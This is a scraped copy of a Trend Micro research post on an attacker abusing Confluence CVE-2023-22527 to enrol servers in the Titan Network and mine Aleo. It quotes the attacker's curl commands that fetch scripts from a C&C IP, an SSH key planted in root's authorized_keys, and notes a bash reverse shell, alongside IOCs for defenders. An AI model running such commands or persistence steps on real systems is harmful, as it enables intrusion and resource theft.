Attacker Abuses Victim Resources to Reap Rewards from Titan Network | Trend Micro (US)<\/title> <link href=\"https:\/\/fonts.googleapis.com\/css?family=Open+Sans:300,300i,400,400i,600\" rel=\"stylesheet\">\n<link href=\"\/\/customer.cludo.com\/css\/296\/1798\/cludo-search.min.css\" type=\"text\/css\" rel=\"stylesheet\"> <link rel=\"stylesheet\" href=\"\/etc.clientlibs\/trendresearch\/clientlibs\/clientlib-trendresearch.min.css\" type=\"text\/css\">\n<link rel=\"stylesheet\" href=\"\/etc.clientlibs\/trendmicro\/clientlibs\/trendmicro-core-2\/clientlibs\/header-footer.min.css\" type=\"text\/css\"> <meta property=\"og:url\" content=\"https:\/\/www.trendmicro.com\/en_us\/research\/24\/j\/titan-network.html\"><br \/>\n<meta property=\"og:title\" content=\"Attacker Abuses Victim Resources to Reap Rewards from Titan Network\"><br \/>\n<meta property=\"og:site_name\" content=\"Trend Micro\"><br \/>\n<meta property=\"og:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/TitanNetwork-thumbnail.jpg\"><br \/>\n<meta property=\"og:locale\" content=\"en_US\"> <meta name=\"twitter:card\" content=\"summary_large_image\"><br \/>\n<meta name=\"twitter:site\" content=\"@TrendMicro\"><br \/>\n<meta name=\"twitter:title\" content=\"Attacker Abuses Victim Resources to Reap Rewards from Titan Network\"><br \/>\n<meta name=\"twitter:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/TitanNetwork-thumbnail.jpg\"> <\/head> <body class=\"articlepage page basicpage context-business\" id=\"readabilityBody\" readability=\"50.622695403791\">  <a id=\"page-scroll\" title=\"VerticalPageScroll\" href=\"javascript:jumpScroll($(this).scrollTop());\"> <span class=\"icon-chevron-up\"><\/span> <\/a>  <\/p>\n<div class=\"root responsivegrid\">\n<div class=\"aem-Grid aem-Grid--12 aem-Grid--default--12 \">\n<div class=\"articleBodyNoHero aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"research-layout article container\" role=\"contentinfo\">\n<article class=\"research-layout--wrapper row\" data-article-pageid=\"2087699125\">\n<div class=\"col-xs-12 col-md-12 one-column\">\n<div class=\"col-xs-12 col-md-12\" readability=\"8.7774725274725\">\n<div class=\"article-details\" role=\"heading\" readability=\"37.06043956044\"> <span class=\"article-details__bar\" role=\"img\"><\/span> <\/p>\n<p class=\"article-details__display-tag\">Cyber Threats<\/p>\n<p class=\"article-details__description\">In this blog entry, we discuss how an attacker took advantage of the Atlassian Confluence vulnerability CVE-2023-22527 to connect servers to the Titan Network for cryptomining purposes.<\/p>\n<p class=\"article-details__author-by\">By: Ranga Duraisamy, Sunil Bharti <time class=\"article-details__date\">October 30, 2024<\/time> <span>Read time: <\/span><span class=\"eta\"><\/span> (<span class=\"words\"><\/span> words) <\/p>\n<div class=\"article-details__icons\">  <\/p>\n<div class=\"a2a_kit a2a_default_style\" data-a2a-icon-color=\"#717172\"> <a class=\"a2a_dd addthis_link\" href=\"https:\/\/www.addtoany.com\/share\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/etc.clientlibs\/trendresearch\/clientlibs\/clientlib-trendresearch\/resources\/img\/share-more.svg\" class=\"svg-icon\" alt=\"Share\"> <\/a> <a class=\"a2a_button_print addthis_link\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/etc.clientlibs\/trendresearch\/clientlibs\/clientlib-trendresearch\/resources\/img\/printer.svg\" class=\"svg-icon\" alt=\"Print\"> <\/a> <\/div>\n<p>   <\/div>\n<\/div><\/div>\n<\/p><\/div>\n<hr class=\"research-layout-divider\"> <main class=\"main--content col-xs-12 col-lg-8 col-lg-push-2\"> <\/p>\n<div class=\"richText\" readability=\"40.436354378819\">\n<div readability=\"26.628818737271\">\n<h4>Summary<\/h4>\n<ul>\n<li><span class=\"rte-red-bullet\">Trend Micro researchers observed an attacker exploiting the Atlassian Confluence vulnerability CVE-2023-22527 to achieve remote code execution for cryptomining via the Titan Network.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">The malicious actor used public IP lookup services and various system commands to gather details about the compromised machine.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">The attack involved downloading and executing multiple shell scripts to install Titan binaries and connect to the Titan Network with the attacker\u2019s identity.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">The malicious actor connects compromised machines to the Cassini Testnet, which allows them to participate in the delegated proof of stake system for reward tokens.<\/span><\/li>\n<\/ul>\n<p>Recently, we observed an attack where an attacker exploited the Atlassian Confluence server vulnerability <a href=\"https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2023-22527\" target=\"_blank\" rel=\"noopener\">CVE-2023-22527<\/a>. This allowed unauthenticated attackers to achieve remote code execution (RCE) and leverage the <a href=\"https:\/\/www.titannet.io\/\" target=\"_blank\" rel=\"noopener\">Titan Network<\/a> for cryptomining activity. Titan Network, which is based on decentralized physical infrastructure networks (DePIN), is an open-source platform that allows users to share and deploy hardware resources, turning them into valuable digital assets like computing power, storage, and bandwidth. Its economic incentives and network design ensure that contributors are rewarded for their resources, while end-users enjoy high-quality, reliable results comparable to modern cloud services. In the attack, the malicious actor compromises victims\u2019 machines and installs Titan edge nodes to reap those rewards.<\/p>\n<h4>Attack sequence<\/h4>\n<p>The attacker tried to compromise the Atlassian Confluence server using CVE-2023-22527, an unauthenticated template injection vulnerability. In the attack payload, the attack sets a response header \u201cCmd\u201d, which contains the result of the commands the attacker executed. The attack starts with the attacker executing the \u201cls\u201d command to check the files in the current directory; the response of this command can be seen in the \u201cCmd\u201d response header (Figure 2). <\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/j\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/TitanNetwork-Fig01.png\" alt=\"Figure 1. Attach chain\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 1. Attach chain<\/figcaption><\/div>\n<\/figure><\/div>\n<div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/j\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/TitanNetwork-Fig02.jpg\" alt=\"Figure 2. The \u201cls\u201d remote command execution and its response\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 2. The \u201cls\u201d remote command execution and its response<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"32.5\">\n<div readability=\"10\">\n<p>Afterwards, the attacker executes the \u201cpwd\u201d command to find the current working directory, as shown in Figure 3.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/j\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/TitanNetwork-Fig03.jpg\" alt=\"Figure 3. Request and response of \u201cpwd\u201d command\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 3. Request and response of \u201cpwd\u201d command<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"28.56976744186\">\n<div readability=\"7.2558139534884\">\n<p>The attacker utilizes the public IP address lookup services <a href=\"https:\/\/ipinfo.io\/\">IPinfo<\/a> and <a href=\"https:\/\/ip-api.com\/\">IP-API<\/a> to identify the server\u2019s additional IP addresses.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/j\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/TitanNetwork-Fig04.jpg\" alt=\"Figure 4. Public IP lookup request\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 4. Public IP lookup request<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"38\">\n<div readability=\"21\">\n<p>The attacker checks the files present in \u201c\/tmp\u201d via the \u201cls \/tmp\u201d command. Then, the attacker gathers details about the operating system via the \u201ccat \/etc\/os-release\u201d command and collects detailed information about the system via the \u201cuname -a\u201d command by executing the system commands remotely, similar to how they used \u201cexec({\u2018curl ip-api.com\u2019})\u201d to execute the commands on the victim\u2019s machine, as shown in Figure 4.<\/p>\n<p>After collecting the required system details, the attacker checks the control group (cgroup) information for the process with PID 1, which is typically the \u201cinit\u201d process in a Linux system. By doing so, the attacker is possibly trying to know if the Atlassian Confluence server is running inside a container; the output from the file can be used further for the privilege escalation.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/j\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/TitanNetwork-Fig05.jpg\" alt=\"Figure 5. Enumeration of \u201ccgroup\u201d \"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 5. Enumeration of \u201ccgroup\u201d <\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"37\">\n<div readability=\"19\">\n<p>The attacker then executed commands remotely, like they did in Figure 4, to check system resources like disk space using \u201cdf \u2013h\u201d and \u201cfree -g\u201d command to find the available memory.<\/p>\n<p>As shown in Figure 6, once the attacker collects all the required system and available resource details, they download a shell script file named \u201c0\u201d to the \u201c\/tmp\u201d directory as a0 in the compromised server, hosted at 3[.]39[.]22[.]13. To avoid file extension-based detections, the attacker does not append a file extension.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/j\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/TitanNetwork-Fig06.jpg\" alt=\"Figure 6. Shell script download request\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 6. Shell script download request<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"32.5\">\n<div readability=\"10\">\n<p>The downloaded shell script shown in Figure 6 downloads the file \u201ctitan.tar.gz\u201d from same server, then extracts the Executable and Linkable Format (ELF) files \u201ctitan-edge\u201d and \u201clibgoworkerd.so\u201d into the \u201c\/tmp\u201d directory (Figure 7). <\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/j\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/TitanNetwork-Fig07.png\" alt=\"Figure 7. Extracts the Titan binaries\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 7. Extracts the Titan binaries<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"33.930066079295\">\n<div readability=\"13.76872246696\">\n<p>Another shell script file named \u201c1\u201d was downloaded to the \u201c\/tmp\u201d directory as \u201ca1\u201d via the <i>curl -o \/tmp\/a1 3[.]39[.]22[.]13\/1<\/i> command in the same way as the \u201c0\u201d script file was downloaded, which overwrites the \u201cLD_LIBRARY_PATH\u201d environment variable. However, \u201cLD_LIBRARY_PATH\u201d is misspelled as \u201cLD_LIZBRARY_PATH\u201d; it is not certain whether this is a typo or misspelled intentionally. Then, the \u201ctitan-edge\u201d daemon starts to initialize a connection with Titan network (Figure 8). The attacker connects to \u201c<a href=\"https:\/\/titannet.gitbook.io\/titan-network-en\/cassini-testnet\/about-cassini-testnet\" target=\"_blank\" rel=\"noopener\">Cassini Testnet<\/a>\u201d, which consists of two main components:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\"><b>Blockchain Network<\/b> – Based on the Delegated Proof of Stake (DPOS) consensus mechanism, users earn rewards by staking TTNT test tokens to participate in the governance and interaction of the chain<\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>Resource Network<\/b> – If you have idle hardware device resources, you can run Titan nodes and earn TNT3 point rewards<\/span><\/li>\n<\/ul><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/j\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/TitanNetwork-Fig08.png\" alt=\"Figure 8. Connects to the Titan Network\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 8. Connects to the Titan Network<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"34.5\">\n<div readability=\"14\">\n<p>The third shell script file, named \u201c2\u201d, was downloaded to the \u201c\/tmp\u201d directory as \u201ca2\u201d via the \u201ccurl -o \/tmp\/a2 3[.]39[.]22[.]13\/2\u201d command, as with the previous steps. This script executes a \u201ctitan-edge\u201d binary with \u201cstorage-size\u201d and \u201cstorage-path\u201d configuration. The device is then bound to \u201ctitan-edge\u201d with the attacker\u2019s identity code, \u201c08DA69AE-6E7C-43F2-A8D0-D97D7FF517A1\u201d (Figure 9).<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/j\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/TitanNetwork-Fig09.png\" alt=\"Figure 9. Binds \u201ctitan-edge\u201d to the attacker\u2019s identity\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 9. Binds \u201ctitan-edge\u201d to the attacker\u2019s identity<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"33\">\n<div readability=\"11\">\n<p>As with the previous steps, the attacker downloads the fourth shell script file as \u201ca3\u201d to the \u201c\/tmp\u201d directory via the \u201ccurl -o \/tmp\/a3 3[.]39[.]22[.]13\/3\u201d command, which saves the node\u2019s unique ID using the \u201cinfo\u201d argument into \u201cinfo.log\u201d file (Figure 10).<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/j\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/TitanNetwork-Fig10.png\" alt=\"Figure 10. Saves \u201ctitan-edge\u201d info into the \u201cinfo.log\u201d file\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 10. Saves \u201ctitan-edge\u201d info into the \u201cinfo.log\u201d file<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"32\">\n<div readability=\"9\">\n<p>The fifth shell script file is downloaded as \u201ca4\u201d to the \u201c\/tmp\u201d directory via the \u201ccurl -o \/tmp\/a4 3[.]39[.]22[.]13\/4\u201d command, which would stop the \u201ctitan-edge\u201d daemon (Figure 11).<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/j\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/TitanNetwork-Fig11.png\" alt=\"Figure 11. Script file to stop the \u201ctitan-edge\u201d daemon\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 11. Script file to stop the \u201ctitan-edge\u201d daemon<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"32\">\n<div readability=\"9\">\n<p>Once all the files are downloaded into the victim\u2018s machine, the attacker validates those in the \u201c\/tmp\u201d folder (Figure 12).<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/j\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/TitanNetwork-Fig12.jpg\" alt=\"Figure 12. Request and response of \u201cls \/tmp\u201d command\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 12. Request and response of \u201cls \/tmp\u201d command<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"31.5\">\n<div readability=\"8\">\n<p>Then the attacker executes the first downloaded file \u201ca0\u201d, shown below in Figure 13.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/j\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/TitanNetwork-Fig13.jpg\" alt=\"Figure 13. Execution of a0 script file \"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 13. Execution of a0 script file <\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"42.067246111619\">\n<div readability=\"30.946020128088\">\n<p>This script file downloads the \u201ctitan-edge\u201d binaries from \u201ctitan.tar.gz\u201d, as described earlier. It verifies if the downloaded file is present by executing the \u201cls -lh \/tmp\u201d command remotely over the attack payload.<\/p>\n<p>Once the attacker confirms that the \u201ctitan-edge\u201d binaries are downloaded into the system, they execute other scripts (a1, a2, a3 and a4); these execute the Titan binaries, connect to the Titan network, and bind the Titan Network to the attacker\u2019s ID. Similarly, the attacker also deploys shell scripts \u201c5\u201d, \u201c6\u201d, \u201c7\u201d as \u201ca5\u201d, \u201ca6\u201d, and \u201ca7\u201d, respectively. The \u201ca5\u201d script file is kind of a fail-safe script: in case the \u201ca0\u201d script doesn\u2019t download and extract the files properly, this script file downloads the same Titan binaries from <a href=\"https:\/\/github.com\/Titannet-dao\/titan-node\/releases\/download\/v0.1.19\/titan-l2edge_v0.1.19_patch_linux_amd64.tar.gz\" target=\"_blank\" rel=\"noopener\">the official Titan GitHub repository<\/a>.<\/p>\n<p>After the successful deployment and connection to the Titan Network, the attacker installs the \u201caleo-pool\u201d client to connect to the \u201czkRush Pool\u201d server and \u201cAleo TestNet Beta\u201d for cryptomining using the shell script \u201ca6\u201d (Figure 14).<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/j\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/TitanNetwork-Fig14.jpg\" alt=\"Figure 14. The \u201ca6\u201d shell script downloads the \u201caleo-pool\u201d client\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 14. The \u201ca6\u201d shell script downloads the \u201caleo-pool\u201d client<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"31.5\">\n<div readability=\"8\">\n<p>It executes the \u201caleo-pool\u201d client via the \u201ca7\u201d script and connects to the aleo[.]zkrush[.]com pool server.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/j\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/TitanNetwork-Fig15.jpg\" alt=\"Figure 15. Connects to mining pool server\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 15. Connects to mining pool server<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"33.5\">\n<div readability=\"12\">\n<p>We also found other files in the attacker\u2019s file server, which seem like they are used to make lateral movement attempts through SSH in the Amazon Web Services (AWS) cloud. In the \u201ca8\u201d script, the attacker downloads and deploys the SSH public key in the RSA format in the root user directory \u201c\/root\/.ssh\/authorized_keys\u201d.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/j\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/TitanNetwork-Fig16.jpg\" alt=\"Figure 16. SSH public key deployment\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 16. SSH public key deployment<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"36\">\n<div readability=\"17\">\n<p>The observed SSH public key is as follows:<\/p>\n<p><b data-rte-class=\"rte-temp\"><span class=\"blockquote\">\u201cssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCl+1YDRZdck+HOkzQwdAWzLkdn1Ws1jmgE9aC93iUuzJlpsMhKkkkziWozsYZrQv7j3Tx1QWtSZg8J5VxMmSY0MhzefdhTYZ0Pf9XYPlVsQiLkBTDeoKyyWZS4NwZBysSzE20\/jq0Ke4tnFIEe39lP1OaIShLofktHKXsx0xUkfDxFMiDgw2nB4cXhATqdhC3nFQXl0wdlzih0\/Yw+QlHoZbQ6\/3kJIdw7kWL1N8GcAkjUtaRK6vONwluEi9HIyNsLVUVqS74v4NNRdKA8Rwdg8R5CQSRnzXaD3e+5tmFIkSzArIQQVktDt+Re6z4ZVYFfNfdjCxeqGTJLP6Yt\/iE7 aaaaaa-1%\u201d<br \/><\/span><\/b>\n<\/p>\n<p>The \u201ca9\u201d file is a modified SSH config file that the attacker possibly uses later to modify the current SSH config file. This updated file contains two noticeable directives, \u201cAuthorizedKeysCommand\u201d and \u201cAuthorizedKeysCommandUser\u201d (Figure 17).<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/j\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/TitanNetwork-Fig17.jpg\" alt=\"Figure 17. SSH directives to connect with AWS EC2 instance\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 17. SSH directives to connect with AWS EC2 instance<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"35\">\n<div readability=\"15\">\n<p>The SSH daemon uses \u201cAuthorizedKeysCommand\u201d and \u201cAuthorizedKeysCommandUser\u201d, which are configured when Instance Connect is installed, to look up the public key from the instance metadata for authentication and connect to the EC2 instance.<\/p>\n<p>We observed another variant of the file named \u201c7\u201d, which performs the bash reverse shell to the C&C server 13[.]236[.]179[.]8 over tcp port 80 (Figure 18).<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/j\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/TitanNetwork-Fig18.jpg\" alt=\"Figure 18. Bash reverse shell\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 18. Bash reverse shell<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"37.922965116279\">\n<div readability=\"22.364825581395\">\n<h4>Conclusion<\/h4>\n<p>By executing a series of reconnaissance, payload deployment, and persistence mechanisms, the attacker efficiently co-opted server resources to integrate compromised systems into the Titan Network for their financial gain. This incident underscores the importance of maintaining up-to-date security patches, rigorous network and file monitoring, and robust access controls. <\/p>\n<p>To mitigate the risk of this kind of threat, organizations can also consider powerful security technologies such as <a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/detection-response.html\" target=\"_blank\" rel=\"noopener\">Trend Vision One\u2122<\/a>, which offers multilayered protection and behavior detection, helping block malicious tools and services before they can inflict damage on user machines and systems.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\">\n<div class=\"responsive-table-wrap\">\n<h4>MITRE ATT&CK techniques<\/h4>\n<p><center><\/p>\n<table border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody readability=\"7\">\n<tr>\n<td width=\"208\" valign=\"top\"><b>Tactic<\/b><\/td>\n<td width=\"208\" valign=\"top\"><b>Technique<\/b><\/td>\n<td width=\"208\" valign=\"top\"><b>Technique ID<\/b><\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"208\" valign=\"top\">Initial Access<\/td>\n<td width=\"208\" valign=\"top\">Exploit Public-Facing Application<\/td>\n<td width=\"208\" valign=\"top\">T1190<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"208\" rowspan=\"3\" valign=\"top\">Discovery<\/td>\n<td width=\"208\" valign=\"top\">System Information Discovery<\/td>\n<td width=\"208\" valign=\"top\">T1082<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"208\" valign=\"top\">File and Directory Discovery<\/td>\n<td width=\"208\" valign=\"top\">T1083<\/td>\n<\/tr>\n<tr>\n<td width=\"208\" valign=\"top\">Process Discovery<\/td>\n<td width=\"208\" valign=\"top\">T1057<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"208\" valign=\"top\">Execution<\/td>\n<td width=\"208\" valign=\"top\">Command and Scripting Interpreter: Unix Shell<\/td>\n<td width=\"208\" valign=\"top\">T1059.004<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"208\" rowspan=\"2\" valign=\"top\">Persistence<\/td>\n<td width=\"208\" valign=\"top\">Hijack Execution Flow: Dynamic Linker Hijacking<\/td>\n<td width=\"208\" valign=\"top\">T1574.006<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"208\" valign=\"top\">Account Manipulation: SSH Authorized Keys<\/td>\n<td width=\"208\" valign=\"top\">T1098.004<\/td>\n<\/tr>\n<tr>\n<td width=\"208\" rowspan=\"2\" valign=\"top\">Command and Control<\/td>\n<td width=\"208\" valign=\"top\">Ingress Tool Transfer<\/td>\n<td width=\"208\" valign=\"top\">T1105<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"208\" valign=\"top\">Application Layer Protocol: Web Protocols<\/td>\n<td width=\"208\" valign=\"top\">T1071.001<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><\/center> <\/div>\n<\/p><\/div>\n<div class=\"richText\">\n<div>\n<h4>Indicators of Compromise (IOCs)<\/h4>\n<ul>\n<li><span class=\"rte-red-bullet\">http:\/\/3[.]39[.]22[.]13\/0<\/span><\/li>\n<li><span class=\"rte-red-bullet\">http:\/\/3[.]39[.]22[.]13\/1<\/span><\/li>\n<li><span class=\"rte-red-bullet\">http:\/\/3[.]39[.]22[.]13\/2<\/span><\/li>\n<li><span class=\"rte-red-bullet\">http:\/\/3[.]39[.]22[.]13\/3<\/span><\/li>\n<li><span class=\"rte-red-bullet\">http:\/\/3[.]39[.]22[.]13\/4<\/span><\/li>\n<li><span class=\"rte-red-bullet\">http:\/\/3[.]39[.]22[.]13\/5<\/span><\/li>\n<li><span class=\"rte-red-bullet\">http:\/\/3[.]39[.]22[.]13\/6<\/span><\/li>\n<li><span class=\"rte-red-bullet\">http:\/\/3[.]39[.]22[.]13\/7<\/span><\/li>\n<li><span class=\"rte-red-bullet\">http:\/\/3[.]39[.]22[.]13\/8<\/span><\/li>\n<li><span class=\"rte-red-bullet\">http:\/\/3[.]39[.]22[.]13\/9<\/span><\/li>\n<li><span class=\"rte-red-bullet\">wss[:]\/\/aleo[.]zkrush[.]com:3333<\/span><\/li>\n<li><span class=\"rte-red-bullet\">13[.]236[.]179[.]8<\/span><\/li>\n<li><span class=\"rte-red-bullet\">35[.]74[.]215[.]126<\/span><\/li>\n<\/ul><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<section class=\"tag--list\">\n<p>Tags<\/p>\n<\/section>\n<p> <\/main> <\/article>\n<\/div>\n<\/div><\/div>\n<\/div>\n<p>   <\/p>\n<p> <span>sXpIBdPeKzI9PC2p0SWMpUSM2NSxWzPyXTMLlbXmYa0R20xk<\/span> <\/p>\n<p>  <\/body> Read More <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/24\/j\/titan-network.html\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>In this blog entry, we discuss how an attacker took advantage of the Atlassian Confluence vulnerability CVE-2023-22527 to connect servers to the Titan Network for cryptomining purposes. Read More HERE…<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[61],"tags":[9510,9511,9509],"class_list":["post-57536","post","type-post","status-publish","format-standard","hentry","category-trendmicro","tag-trend-micro-research-articles-news-reports","tag-trend-micro-research-cyber-threats","tag-trend-micro-research-research"],"yoast_head":"\n<title>Attacker Abuses Victim Resources to Reap Rewards from Titan Network 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Attacker Abuses Victim Resources to Reap Rewards from Titan Network 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta 